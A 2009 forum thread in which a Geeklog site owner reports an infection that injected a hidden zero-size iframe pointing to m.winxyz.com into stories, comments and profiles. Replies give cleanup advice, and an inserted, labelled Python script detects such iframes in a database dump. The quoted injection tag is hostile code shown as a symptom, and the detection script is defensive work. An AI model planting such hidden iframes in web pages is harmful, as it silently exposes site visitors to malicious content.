Posted on: 04/03/09 03:15am
By: Anonymous (ismael)
Hi,
Last night I suffered a worm infection. I use Geeklog 1.4.1. All my stories and comments have an m.winxyz.com reference.
Thank you,
ismael
Re: worm infection
Posted on: 04/03/09 03:18am
By: Anonymous (ismael)
Every new user has this web in his profile: <iframe src=http://m.winxyz.com width=0 height=0></iframe>
Re: worm infection
Posted on: 04/03/09 07:52am
By: Anonymous (ismael)
Can it be due to FCKeditor SQL injection?
Re: worm infection
Posted on: 04/03/09 07:58am
By: Dirk
No idea where it's coming from but it sounds like files on your server were modified, so it could be that your server was compromised.
Searching Google for "m.winxyz.com" finds a lot of hits on other sites (many not running Geeklog), so it doesn't seem to be limited to Geeklog sites.
Make a database backup and check if that link is in there somewhere. If it isn't, the easiest way would be to remove all the files and upload everything fresh, then use the same database.
bye, Dirk
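Dirk's suggestion to check the database backup for the link, sketched as an added example that is not part of the original thread or of Geeklog: it scans a mysqldump-style text for iframes that point at the reported domain or are sized to zero, and counts them per table. The table names and dump rows are constructed sample data, and `backup.sql` in the comment is a hypothetical file name.

```python
import re
from collections import Counter

# Any <iframe ...> opening tag; attributes may be bare, quoted, or carry the
# backslash-escaped quotes that appear inside a SQL dump.
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
# width=0 / height="0" / width=\"0px\" : an invisible frame.
ZERO_DIM_RE = re.compile(r"""\b(?:width|height)\s*=\s*\\?["']?0(?:px)?\b""",
                         re.IGNORECASE)
# Table name from a mysqldump INSERT statement.
INSERT_RE = re.compile(r"^INSERT INTO [`\"]?(\w+)[`\"]?", re.IGNORECASE)


def scan_dump(lines, domain):
    """Return Counter {table: number of suspicious iframes} for a SQL dump."""
    hits = Counter()
    table = "(unknown)"
    for line in lines:
        m = INSERT_RE.match(line)
        if m:
            table = m.group(1)
        for tag in IFRAME_RE.findall(line):
            # Flag the tag if it references the domain or is zero-sized.
            if domain.lower() in tag.lower() or ZERO_DIM_RE.search(tag):
                hits[table] += 1
    return hits


# Constructed sample rows (not taken from any real site).
SAMPLE_DUMP = [
    r"INSERT INTO `gl_stories` VALUES ('s1','Welcome','<p>Hi</p><iframe src=http://m.winxyz.com width=0 height=0></iframe>');",
    r"INSERT INTO `gl_stories` VALUES ('s2','Video','<iframe src=\"http://video.example/embed\" width=\"560\" height=\"315\"></iframe>');",
    r"INSERT INTO `gl_users` VALUES (2,'admin','<iframe src=http://m.winxyz.com width=0 height=0></iframe>'),(3,'bob','<iframe src=http://m.winxyz.com width=0 height=0></iframe>');",
    r"INSERT INTO `gl_comments` VALUES (1,'nice post');",
]

if __name__ == "__main__":
    # For a real backup, pass the open file instead of SAMPLE_DUMP, e.g.
    # open("backup.sql", encoding="utf-8", errors="replace")
    for table, count in sorted(scan_dump(SAMPLE_DUMP, "m.winxyz.com").items()):
        print(f"{table}: {count} suspicious iframe(s)")
```

The zero-size check also catches injected frames that use a different domain, while the ordinary 560x315 embed in the sample is left alone.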
Re: worm infection
Posted on: 04/03/09 11:16am
By: Anonymous (ismael)
More info about this.
I detected that the problem comes from a user that has story admin privileges. It seems that this user has a trojan that takes access to my Geeklog site and modifies his stories.
Now this user is suspended, but I'm really worried about this situation if the security of my site depends on my users' security.
This morning, all accounts on my site have their profile modified, also my profile as admin. I can't explain it myself.
The Geeklog files have not been modified.
Thank you,
ismael
Re: worm infection
Posted on: 04/03/09 01:52pm
By: guganbl
I had a similar problem some time ago. The reason was a compromised FTP account.
The person that used that account had a virus, and from that moment something started inserting lines that pointed to other infected sites in my GL. I downloaded the complete GL and scanned all files to find the code, and then replaced those files.
A faster way to deal with this is to replace all files and use the same old DB, as Dirk told you.
And change the password on your FTP account, just in case.